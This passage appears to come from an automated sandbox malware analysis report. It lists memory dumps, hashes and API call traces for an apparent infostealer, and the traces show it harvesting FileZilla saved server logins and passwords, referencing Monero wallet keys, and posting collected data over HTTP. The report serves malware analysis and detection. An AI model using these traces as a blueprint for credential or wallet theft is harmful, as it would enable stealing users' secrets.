                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #){|
                                • API String ID: 0-824655753
                                • Opcode ID: 6b58f71fc8fb2432bb2987333ffe2c0cc700f0e4992247d18fe06dbae6d9b9e4
                                • Instruction ID: 8c696f8fcafd919be4168e10707d692d4e95de2160490a0842d60fa4fb95998a
                                • Opcode Fuzzy Hash: 6b58f71fc8fb2432bb2987333ffe2c0cc700f0e4992247d18fe06dbae6d9b9e4
                                • Instruction Fuzzy Hash: 8A7109F3E086109FE7045E2DEC8576ABBD6EBD4320F1A863DDBC897380E53958058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: b]]
                                • API String ID: 0-2059604072
                                • Opcode ID: 0b3e1cfbcb3b95d05cdb72619ecb6262e449e61a7158330de939a0819c5d2b0c
                                • Instruction ID: 094c0c6134f34aad65fa7b54183c1fce2ab7a4923c950b2c8111250e78b47dd6
                                • Opcode Fuzzy Hash: 0b3e1cfbcb3b95d05cdb72619ecb6262e449e61a7158330de939a0819c5d2b0c
                                • Instruction Fuzzy Hash: 505117B36082005FE314ED3DED4977BBBDAEBC4730F2A863DE694C7688E93458058256
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'F
                                • API String ID: 0-682699343
                                • Opcode ID: 94fba5b7447651d7e6a7fb4e321d7a839ebff4666469cb83b9ef51dd426b5c94
                                • Instruction ID: cce77198ff41a0f564e39e19325e0fa063d2804f9e31d27d008d17eea7fa1ee2
                                • Opcode Fuzzy Hash: 94fba5b7447651d7e6a7fb4e321d7a839ebff4666469cb83b9ef51dd426b5c94
                                • Instruction Fuzzy Hash: 0351F0F360C3049FE3106E29DC8576EBBE1EB98320F06093DE7D4C3780E63958558A86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )Q?{
                                • API String ID: 0-235534759
                                • Opcode ID: 4695142bcda3c2e0f4f2f3ba7de3260945e6efc042ba13c49ca8d5e419195a1c
                                • Instruction ID: 8b1639781d2c735cb9175e130eb8dbdadbd5e4608cfe1cd55950e36bd8b6366e
                                • Opcode Fuzzy Hash: 4695142bcda3c2e0f4f2f3ba7de3260945e6efc042ba13c49ca8d5e419195a1c
                                • Instruction Fuzzy Hash: 724169B37186041FE31C593CED67A7B76CADB94230F29413EE656D7780FD2A98014295
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: af66ae12452379ad410662fde541a46e53a8cd163c7b26b1adeec745b377db9c
                                • Instruction ID: 4bbc0faa2d7429bc4ef45714cee004e0da27942370250d9a358487f4fae518e2
                                • Opcode Fuzzy Hash: af66ae12452379ad410662fde541a46e53a8cd163c7b26b1adeec745b377db9c
                                • Instruction Fuzzy Hash: 366113F390C2009BE3046E29ED8577AF7E5EF94720F1A893DD6C983B84D9395C148796
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7274656e5f650b97986d66a555abb5a985adf27a8325b536dbb9e82c730c745e
                                • Instruction ID: 4a99e58974119421304a8292b9144ea788e0b1472a68123f49dc042bcf204501
                                • Opcode Fuzzy Hash: 7274656e5f650b97986d66a555abb5a985adf27a8325b536dbb9e82c730c745e
                                • Instruction Fuzzy Hash: 4C6129B3A082109FE314AE69DC8476BBBD5EBD4320F1AC53DDAC897744DA794C0587C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6c215728803b318a61b11d92e9bba7860ae8ae51851bc939ef747d36d056463
                                • Instruction ID: 0932cde4508b02f8d08205a88d7fa0355ff019cf5e02acb135e3ecc2e88aeefd
                                • Opcode Fuzzy Hash: f6c215728803b318a61b11d92e9bba7860ae8ae51851bc939ef747d36d056463
                                • Instruction Fuzzy Hash: 4C51F6B3B092045FF3046E7DDD4477AB7DAEBD4320F2B863DEA8483784E97558058155
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f70aa49f2b0551ad9556f2af1c8a789077f2b92f149e51acdb9a2a7eedd90c20
                                • Instruction ID: b136676b35dbbbfd545f616fcb51be593ca0e018f5fd061175cde4c7cabba478
                                • Opcode Fuzzy Hash: f70aa49f2b0551ad9556f2af1c8a789077f2b92f149e51acdb9a2a7eedd90c20
                                • Instruction Fuzzy Hash: BB515CF7A082145FE314AA39DC4577BFB99EBD4720F26853DDAC9D3784EA3588028192
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e1b7846a52446305efc5aa27e0d7f9b19a5a950d30790a54797073e971b204a
                                • Instruction ID: eab496a6337cd8984e1e0aa57bdc35b1bced399062ca75c53110d0c185caaa6e
                                • Opcode Fuzzy Hash: 9e1b7846a52446305efc5aa27e0d7f9b19a5a950d30790a54797073e971b204a
                                • Instruction Fuzzy Hash: 194117B3A082209BE3186E2DEC557BAFBD5EF94720F16453DDAC5D3380E9795C4086C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac4946bb804758794658792ff53ea26b71918f11b9f16f25541618fbcb8897c9
                                • Instruction ID: 949c9767b1d20c3ee3c7ef8fe340dd18d14c5e58327f7efec0086af7741f2b90
                                • Opcode Fuzzy Hash: ac4946bb804758794658792ff53ea26b71918f11b9f16f25541618fbcb8897c9
                                • Instruction Fuzzy Hash: 833148F381C61DEFC3185FA49E6163EB6D5AB58350F564A2DF9C79B70CE5B108818283
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00C50DBA,00C50DB7,00C50DB6,00C50DB3), ref: 00C40362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C40369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C40385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C403CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C403DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00C40419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C40463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C40562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00C40571
                                • lstrcat.KERNEL32(?,url: ), ref: 00C40580
                                • lstrcat.KERNEL32(?,00000000), ref: 00C40593
                                • lstrcat.KERNEL32(?,00C51678), ref: 00C405A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00C405B5
                                • lstrcat.KERNEL32(?,00C5167C), ref: 00C405C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00C405D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00C405E6
                                • lstrcat.KERNEL32(?,00C51688), ref: 00C405F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00C40604
                                • lstrcat.KERNEL32(?,00000000), ref: 00C40617
                                • lstrcat.KERNEL32(?,00C51698), ref: 00C40626
                                • lstrcat.KERNEL32(?,00C5169C), ref: 00C40635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 7f2b12d646851e28e1ffebbc1b87422527b667644c49ede37663dab1fed22db7
                                • Instruction ID: cade58aeab03dc2aecdabf3fa54209c46841dc607e3b68636908b87c919c04ea
                                • Opcode Fuzzy Hash: 7f2b12d646851e28e1ffebbc1b87422527b667644c49ede37663dab1fed22db7
                                • Instruction Fuzzy Hash: 9ED14175940208AFDB04EBF4DD9AEEE7338FF54301F544428F506B6091DE34AA49EB66
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C359F8
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C35A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C35B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,019FF1F0,00000000,?,019FE708,00000000,?,00C51A1C), ref: 00C35E71
                                • lstrlen.KERNEL32(00000000), ref: 00C35E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C35E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C35E9A
                                • lstrlen.KERNEL32(00000000), ref: 00C35EAF
                                • lstrlen.KERNEL32(00000000), ref: 00C35ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C35EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00C35F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C35F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C35F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00C35FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00C35FBD
                                • HttpOpenRequestA.WININET(00000000,019FF1E0,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C35BF8
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • InternetCloseHandle.WININET(00000000), ref: 00C35FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: caf5f1fbbd153ffc8637a38b3de5cad463b95ebdf3dc1ef40478ab84adf0db08
                                • Instruction ID: fb586a665d7cb260ab400308e38952464b368017280295b05351bf5552d89be8
                                • Opcode Fuzzy Hash: caf5f1fbbd153ffc8637a38b3de5cad463b95ebdf3dc1ef40478ab84adf0db08
                                • Instruction Fuzzy Hash: 58121E71860118ABEB15EBA0DC96FEEB378FF54700F5041A9F50A72091EF702A89DF65
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C3D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C3D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D208
                                • lstrcat.KERNEL32(?,00C51478), ref: 00C3D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D22A
                                • lstrcat.KERNEL32(?,00C5147C), ref: 00C3D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D24C
                                • lstrcat.KERNEL32(?,00C51480), ref: 00C3D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D26E
                                • lstrcat.KERNEL32(?,00C51484), ref: 00C3D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D290
                                • lstrcat.KERNEL32(?,00C51488), ref: 00C3D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D2B2
                                • lstrcat.KERNEL32(?,00C5148C), ref: 00C3D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D2D4
                                • lstrcat.KERNEL32(?,00C51490), ref: 00C3D2E3
                                  • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                  • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                • lstrlen.KERNEL32(?), ref: 00C3D32A
                                • lstrlen.KERNEL32(?), ref: 00C3D339
                                  • Part of subcall function 00C4AA70: StrCmpCA.SHLWAPI(019F8B78,00C3A7A7,?,00C3A7A7,019F8B78), ref: 00C4AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 130810c6f78677b22552bd8b4153f5ae68485a9b7744911e02a8bcc3113ccbee
                                • Instruction ID: 50a76bf17388e228426aad75e066a3b5aa96bba362bdbcfc189deb902b505ef6
                                • Opcode Fuzzy Hash: 130810c6f78677b22552bd8b4153f5ae68485a9b7744911e02a8bcc3113ccbee
                                • Instruction Fuzzy Hash: 73E14C71950108AFEB08EBA1DD9AEEE7378FF54301F144168F507B6091DE34AE49EB62
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C34915
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C3493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C34ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C50DDB,00000000,?,?,00000000,?,",00000000,?,019FF230), ref: 00C34DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C34E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C34E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C34E49
                                • InternetCloseHandle.WININET(00000000), ref: 00C34EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00C34EC5
                                • HttpOpenRequestA.WININET(00000000,019FF1E0,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C34B15
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • InternetCloseHandle.WININET(00000000), ref: 00C34ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                • Instruction ID: 422e796f6253694162592d319c489ffa0b60509184ce27af1805af65e2b0661b
                                • Opcode Fuzzy Hash: cd0b9fbbd40b0d4a9df14bb02664bf49e5cab4bfb4a62b20c006c51b682b1dcd
                                • Instruction Fuzzy Hash: D412ED72950218AAEB15EB90DC92FEEB778FF54300F5041A9B50672091EF702F89DF66
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,019FD680,00000000,?,00C5144C,00000000,?,?), ref: 00C3CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C3CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00C3CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C3CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C3CAD9
                                • StrStrA.SHLWAPI(?,019FD770,00C50B52), ref: 00C3CAF7
                                • StrStrA.SHLWAPI(00000000,019FD788), ref: 00C3CB1E
                                • StrStrA.SHLWAPI(?,019FDD60,00000000,?,00C51458,00000000,?,00000000,00000000,?,019F8AF8,00000000,?,00C51454,00000000,?), ref: 00C3CCA2
                                • StrStrA.SHLWAPI(00000000,019FDD00), ref: 00C3CCB9
                                  • Part of subcall function 00C3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                  • Part of subcall function 00C3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                • StrStrA.SHLWAPI(?,019FDD00,00000000,?,00C5145C,00000000,?,00000000,019F8AE8), ref: 00C3CD5A
                                • StrStrA.SHLWAPI(00000000,019F8A38), ref: 00C3CD71
                                  • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                  • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                  • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                • lstrlen.KERNEL32(00000000), ref: 00C3CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00C3CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: a782675d205d316fab0c982b30eaedbc4a54565520a08f8d43acdd388b6c2a58
                                • Instruction ID: 8196885144d3cfe117af37b97023c9249a8074c35882ac5b250bf2e4075b17fd
                                • Opcode Fuzzy Hash: a782675d205d316fab0c982b30eaedbc4a54565520a08f8d43acdd388b6c2a58
                                • Instruction Fuzzy Hash: 26E1EB71950108AFEB14EBA0DC96FEEB778FF54300F444169F506B6191EF306A8ADB62
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • RegOpenKeyExA.ADVAPI32(00000000,019FB8C8,00000000,00020019,00000000,00C505B6), ref: 00C483A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                • wsprintfA.USER32 ref: 00C48459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                • Instruction ID: 2ceb71322006e354ce8cb2ac69abd507c3578fcc0e2e5a13591771481cb056e7
